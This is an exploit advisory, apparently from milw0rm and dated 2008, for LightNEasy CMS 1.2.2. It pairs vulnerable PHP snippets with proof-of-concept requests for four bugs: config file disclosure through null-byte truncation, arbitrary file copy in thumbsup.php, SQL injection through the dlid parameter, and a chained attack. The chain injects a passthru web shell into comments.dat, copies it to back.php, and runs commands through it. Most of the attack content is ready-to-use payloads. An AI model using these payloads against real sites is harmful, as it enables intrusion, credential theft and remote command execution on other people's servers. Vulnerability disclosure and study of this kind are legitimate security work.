
LightNEasy SQLite no database 1.2.2 Multiple Remote Vulnerabilities

   1    # Author:          __GiReX__
   2    # mySite:          girex.altervista.org
   3    # Date:            14/04/08
   4
   5    # CMS:             LightNEasy SQLite / no database <= 1.2.2
   6    # Site:            lightneasy.org
   7
   8    # Advisory:        Multiple Remote Vulnerabilities
   9
   10   # Need:           magic_quotes_gpc = Off for Bugs 1-3 (the %00 truncation in their requests depends on it)
   11                     magic_quotes_gpc = On / Off for the SQL Injections in Bug 4 (the injected value is unquoted)
   12
   13   ######################################################################################
   14
   15   # Bug 1:          Remote File Disclosure
   16   # Affected:       SQLite / no database
   17
   18   # Returns the contents of config.php inside the HTML output (as a comment)
   19   # Note: config.php does not exist in the SQLite version
   20
   21   # PoC:            [host]/[path]/LightNEasy.php?page=config.php%00
   22
   23   ######################################################################################
   24
   25   # Bug 2:          Arbitrary file copy and rename / Thumbsup v1.12
   26   # Affected:       SQLite / no database
   27
   28   # This vulnerability is in an external script (Thumbsup, by Gerd Tentler) that LightNEasy
   29   # includes by default
   30
   31   # Vuln Code:      LightNEasy/thumbsup.php
   32
   33   34.    if(isset($_REQUEST[’image’])) $image = $_REQUEST[’image’];
   34   37.    if(isset($_REQUEST[’cache_dir’])) $cache_dir = $_REQUEST[’cache_dir’];
   35
   36   407.   if($image) {
   37            if($fp = @fopen($image, ’rb’)) {      <==
   38              $size = filesize($image);           <==   Unfortunately filesize() does not accept remote files, so only local paths can be copied
   39              $data = fread($fp, $size);          <==
   40             fclose($fp);
   41
   42              $original = "$cache_dir/img_" . md5($image . $size);   <==
   43            }
   44              else $error = ’Could not open’;
   45   414.   }
   46
   47   451.   if(!file_exists($original)) {
   48                if($fp = @fopen($original, ’wb’)) {          <==
   49                  fwrite($fp, $data, strlen($data));         <==
   50                  fclose($fp);
   51   455.      }
   52

   53   # Note: config.php does not exist in the SQLite version
   54
   55   # PoC:            [host]/[path]/LightNEasy/thumbsup.php?image=../data/config.php&cache_dir=config.txt%00
   56
   57   # The copied file can then be read from the web root (file disclosure):
   58
   59   # PoC:            [host]/[path]/LightNEasy/config.txt
   60
   61   ######################################################################################
   62
   63   # Bug 3:          Remote Command Execution
   64   # Affected:       SQLite / no database
   65
   66   # First, inject PHP code into comments.dat via $_POST['newsid'], which is written without any sanitization
   67
   68   # Vuln code:      LightNEasy/runtime.php
   69
   70   32.      if($_POST[’submit’]=="sendcomment") {
   71   ...
   72   42.      if(!$fp=fopen("data/comments.dat","a")) die ($langmessage[142]);
   73   43.         fwrite($fp,$_POST[’newsid’]."|".encode($_POST[’commentname’])."|".    <==
   74   44.         encode($_POST[’commentemail’])."|".time()."|".encode(stripslashes($_POST[’commentmessage’]))."||");
   75
   76
   77   # PoC:    Requires that the admin has created some news and that the news page exists (it may have a different name)
   78
   79            POST [host]/[path]/LightNEasy.php?page=news
   80            Content−Type: application/x−www−form−urlencoded
   81
   82            commentname=1&commentemail=1&commentmessage=1&secCode=[CAPTCHA CODE]
   83            &submit=sendcomment&newsid=<?php passthru($_GET[’cmd’]); ?>/*
   84
   85
   86   # Then create a file back.php with the trick of Bug 2
   87
   88   # PoC:            [host]/[path]/LightNEasy/thumbsup.php?image=../data/comments.dat&cache_dir=../back.php%00
   89
   90   # Finally send remote commands to back.php
   91
   92   # PoC:            [host]/[path]/back.php?cmd=ls
   93
   94   ######################################################################################
   95
   96   # Bug 4:          Multiple Remote SQL Injections
   97   # Affected:       SQLite
   98
   99   # Works with magic_quotes_gpc = On / Off
  100
  101
  102   # Vuln Code:      /LightNEasy/lightneasy.php
  103
  104   237.      if(isset($_GET[’dlid’])) {
  105              $result=dbquery("SELECT * FROM downloads WHERE reg=".$_GET[’dlid’]);
  106
  107
  108   # PoC:          [host]/[path]/index.php?dlid=−1 OR 1
  109
  110   # Further SQL injections of the same pattern (unescaped request values concatenated into dbquery()) exist elsewhere in the code
  111
  112   ######################################################################################
  113
  114   # milw0rm.com [2008-04-15]





				